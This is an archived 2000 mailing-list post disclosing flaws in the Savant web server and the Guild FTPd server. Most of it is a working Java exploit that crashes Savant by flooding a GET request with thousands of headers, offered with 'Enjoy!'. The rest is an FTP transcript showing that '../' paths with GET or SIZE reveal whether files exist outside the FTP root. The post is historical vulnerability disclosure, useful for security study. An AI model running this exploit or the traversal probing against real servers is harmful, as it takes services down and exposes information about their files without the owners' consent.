OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: gnu-pop3d (FTGate problem), Savant Webserver, Guild FTPd
From: Andrew Lewis (wizdumbUNIX.ZA.NET)
Date: Sat Jul 08 2000 - 08:41:29 CDT


Yo,

Errr... Sorry about saying gnu-pop3d had the same problem as FTGate -
don't know how that got in my list - I assume from posting after a rather
hectic party and before that vital cup of coffee the next day. :)
Apologies, all.

Anyway, I found a stack overflow in the Savant webserver the other day -
lemmee just paste the code I wrote here...

/* The MDMA Crew's proof-of-concept code for the buffer overflow in Savant
 * Written by Wizdumb <wizdumbleet.org || www.mdma.za.net/fk>
 *
 * The overflow occurs when the server recieves too many headers in the GET
 * request. The results of the attack look something like...
 *
 * SAVANT caused an invalid page fault
 * in module KERNEL32.DLL at 015f:bff87eb5.
 *
 * Registers:
 *
 * EAX=c00300ec CS=015f EIP=bff87eb5 EFLGS=00010212
 * EBX=0119ff90 SS=0167 ESP=0109ffc4 EBP=010a0030
 * ECX=010a01e4 DS=0167 ESI=8162f198 FS=20f7
 * EDX=bff76859 ES=0167 EDI=010a020c GS=0000
 *
 * Bytes at CS:EIP:
 * 53 56 57 8b 30 83 7d 10 01 8b 4e 38 89 4d f8 75
 *
 * Stack dump:
 *
 * Enjoy!
 * Andrew Lewis aka. Wizdumb [03/07/2000]
 */

import java.io.*;
import java.net.*;

class savantstack {

 public static void main(String[] args) throws IOException {

   if (args.length != 1) {
     System.out.println("Syntax: java savantstack [hostname/ip]");
     System.exit(1); }

   Socket soq = null;
   PrintWriter white = null;

   int i = 5000; // This should do fine :-)

   soq = new Socket(args[0], 80);
   white = new PrintWriter(soq.getOutputStream(), true);

   System.out.print("Showing " + args[0] + " the phj33r :P ...");
   white.print("GET /index.html HTTP/1.0");
   for (int x = 0; x < i; x++) white.println("A:A");
   white.println("\n");
   System.out.println("Done!");

   white.close();
   soq.close(); } }

That's it. I also found a more minor vulnerability in Guild FTPd -
although directory transversal with GET can't be used to d/l files outside
of the FTP root directory, it can be used to see if files exist. An
example follows...

C:\wizdumb>ftp localhost
Connected to kung-phusion.
220-GuildFTPD FTP Server (c) 1999
220-Version 0.93i
220 Please enter your name:
User (kung-phusion:(none)): test
331 User name okay, Need password.
Password:
230 User logged in.
ftp> cd ..
550 Access denied.
ftp> get ../nonexistant.txt
200 PORT command successful.
550 Access denied.
ftp> get ../autoexec.bat
200 PORT command successful.
150 Opening ascii mode data connection for \../autoexec.bat (1143 bytes).
425 Download failed.
ftp> quit
221 Goodbye. Control connection closed.

The SIZE command can also be used in a similar manner.

Anyway, I'm outta here again...

Cheers,
Andrew Lewis aka. Wizdumb [MDMA]

wizdumbleet.org
www.mdma.za.net/fk